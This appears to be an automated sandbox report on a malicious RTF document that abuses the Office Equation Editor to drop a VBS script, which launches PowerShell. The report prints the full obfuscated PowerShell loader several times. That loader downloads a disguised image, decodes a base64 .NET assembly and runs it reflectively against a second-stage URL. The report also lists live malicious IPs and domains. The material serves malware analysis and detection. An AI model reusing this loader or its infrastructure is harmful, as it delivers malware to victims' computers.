Network Connect: 91.92.254.29 80

Jump to behavior

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_03510668

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.95.235.16 23.95.235.16
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /33011/greatideaforfollowers.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_xgep41gp.dyp.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.254.29

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_03510668

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F0D9C1B9-F0D5-4902-9161-FED34811C4AD}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33011/greatideaforfollowers.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_xgep41gp.dyp.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29

Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: uploaddeimagens.com.br

Source: EQNEDT32.EXE, 00000002.00000002.346070197.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.1
Source: EQNEDT32.EXE, 00000002.00000002.346070197.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/grJ
Source: EQNEDT32.EXE, 00000002.00000002.346070197.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gif
Source: EQNEDT32.EXE, 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gifj
Source: EQNEDT32.EXE, 00000002.00000002.346070197.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gifyyC:
Source: wscript.exe, 00000005.00000002.359992594.0000000000677000.00000004.00000020.00020000.00000000.sdmp, greatideaforfollowers.vBS.2.dr, greatideaforfollowers[1].gz.2.dr	String found in binary or memory: http://91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt
Source: powershell.exe, 00000006.00000002.359414442.0000000004FF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.358503012.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.358503012.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uploaddeimagens.com.br
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000002.358503012.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000006.00000002.358383867.00000000004D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.359414442.0000000004F86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235YKo;
Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p
Source: powershell.exe, 00000006.00000002.358503012.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

System Summary

Malicious sample detected (through community Yara rule)

Source: 4YlwTsmpuZ.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Yara signature match

Source: 4YlwTsmpuZ.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.expl.evad.winRTF@7/12@1/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$lwTsmpuZ.rtf

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR65F3.tmp

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 4YlwTsmpuZ.rtf	Virustotal: Detection: 52%
Source: 4YlwTsmpuZ.rtf	ReversingLabs: Detection: 50%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
